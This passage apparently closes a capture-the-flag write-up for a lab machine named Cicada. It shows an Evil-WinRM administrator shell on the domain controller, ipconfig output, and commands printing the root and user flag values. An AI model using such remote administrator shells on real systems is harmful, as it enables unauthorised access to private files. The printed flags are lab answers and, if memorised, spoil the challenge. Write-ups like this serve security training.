CICADA-DC
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::324:625e:dac3:38b3
Link-local IPv6 Address . . . . . : fe80::97ab:bac3:c0d:e7ab%6
IPv4 Address. . . . . . . . . . . : 10.129.136.252
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%6
10.129.0.1
And we can read both flags:
*Evil-WinRM* PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
dd2ae5d8b143504347bbda76ca1bcc7c
*Evil-WinRM* PS C:\Users> type C:\Users\emily.oscars.cicada\Desktop\user.txt
397350d069970a4f85efa566ce714f88